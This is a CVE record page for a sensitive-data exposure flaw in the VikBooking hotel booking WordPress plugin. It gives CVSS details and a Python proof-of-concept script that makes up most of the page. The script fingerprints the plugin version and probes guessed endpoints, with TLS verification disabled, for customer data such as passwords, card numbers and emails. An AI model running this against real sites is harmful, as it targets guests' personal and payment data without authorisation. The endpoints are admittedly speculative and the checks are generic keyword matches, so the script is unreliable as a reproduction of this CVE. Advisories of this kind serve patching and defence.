Security Vulnerability Report
CVE-2025-49918 CVSS 5.9 MEDIUM

CVE-2025-49918

Published: 2025-12-18 08:15:52
Last Modified: 2026-04-27 20:16:17

Description

Insertion of Sensitive Information Into Sent Data vulnerability in e4jvikwp VikBooking Hotel Booking Engine & PMS vikbooking allows Retrieve Embedded Sensitive Data. This issue affects VikBooking Hotel Booking Engine & PMS: from n/a through <= 1.8.2.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

VikBooking Hotel Booking Engine & PMS <= 1.8.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-49918 PoC - VikBooking Sensitive Information Disclosure
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-49918
# Affected: VikBooking Hotel Booking Engine & PMS <= 1.8.2

import requests
import sys
import re


def check_vikbooking_version(target_url):
    """Check if VikBooking plugin is installed and get version"""
    print(f"[*] Checking target: {target_url}")

    # Common paths for VikBooking plugin
    paths = [
        '/wp-content/plugins/vikbooking/readme.txt',
        '/wp-content/plugins/vikbooking/vikbooking.php',
        '/wp-json/wp/v2/plugins?search=vikbooking'
    ]

    for path in paths:
        url = target_url.rstrip('/') + path
        try:
            response = requests.get(url, timeout=10, verify=False)
            if response.status_code == 200:
                print(f"[+] VikBooking detected at: {url}")

                # Extract version if available
                version_match = re.search(
                    r'Text Domain:\s*vikbooking.*?Version:\s*([\d.]+)',
                    response.text, re.DOTALL
                )
                if version_match:
                    version = version_match.group(1)
                    print(f"[+] Detected version: {version}")

                    # Check if vulnerable. Pad to three components so a
                    # two-part version string such as "1.8" does not raise
                    # an IndexError on version_parts[2].
                    version_parts = [int(x) for x in version.split('.')]
                    while len(version_parts) < 3:
                        version_parts.append(0)
                    if version_parts[0] < 1 or \
                       (version_parts[0] == 1 and version_parts[1] < 8) or \
                       (version_parts[0] == 1 and version_parts[1] == 8 and version_parts[2] <= 2):
                        print(f"[!] Version {version} is VULNERABLE ( <= 1.8.2 )")
                        return version
        except requests.RequestException as e:
            print(f"[-] Error accessing {url}: {e}")

    return None


def test_sensitive_data_exposure(target_url, proxies=None):
    """Test for sensitive information disclosure vulnerability"""
    print("\n[*] Testing for sensitive data exposure...")

    # Common VikBooking endpoints that might leak data
    endpoints = [
        '/wp-admin/admin-ajax.php?action=vikbooking&task=get_booking_details',
        '/wp-admin/admin-ajax.php?action=vikbooking&task=get_customer_info',
        '/index.php?option=com_vikbooking&task=booking_details',
        '/components/com_vikbooking/views/booking/tmpl/default.xml'
    ]

    vulnerable = False
    sensitive_patterns = [
        r'password',
        r'credit_card',
        r'cvv',
        r'social_security',
        r'email.*@.*\.(com|org|net)',
        r'phone.*\d{10,}',
        r'address.*\d{5,}',
        r'api_key',
        r'secret'
    ]

    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        try:
            response = requests.get(url, timeout=10, proxies=proxies, verify=False)

            # Check for sensitive data in response
            for pattern in sensitive_patterns:
                if re.search(pattern, response.text, re.IGNORECASE):
                    print(f"[!] Potential sensitive data found at: {endpoint}")
                    print(f"    Pattern matched: {pattern}")
                    vulnerable = True
        except requests.RequestException as e:
            print(f"[-] Error testing {endpoint}: {e}")

    if vulnerable:
        print("\n[!] VULNERABLE: Sensitive information disclosure detected")
    else:
        print("\n[*] No obvious sensitive data exposure detected")
        print("[*] Manual testing recommended for full verification")

    return vulnerable


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-49918_poc.py <target_url>")
        print("Example: python cve-2025-49918_poc.py http://example.com")
        sys.exit(1)

    target = sys.argv[1]

    # Suppress SSL warnings (for testing purposes)
    import urllib3
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

    version = check_vikbooking_version(target)
    if version:
        test_sensitive_data_exposure(target)
    else:
        print("[-] VikBooking plugin not detected or not accessible")

    print("\n[*] Scan complete")
    print("[*] Note: This is a basic check. Full vulnerability assessment requires manual testing.")

References

Patchstack advisory: https://patchstack.com/database/Wordpress/Plugin/vikbooking/vulnerability/wordpress-vikbooking-hotel-booking-engine-pms-plugin-1-8-2-sensitive-data-exposure-vulnerability?_s_id=cve

Additional Record Fields

Weakness: CWE-201 (Insertion of Sensitive Information Into Sent Data)
Vulnerability Status: Deferred
CVSS v3.1 Exploitability Score: 2.2
CVSS v3.1 Impact Score: 3.6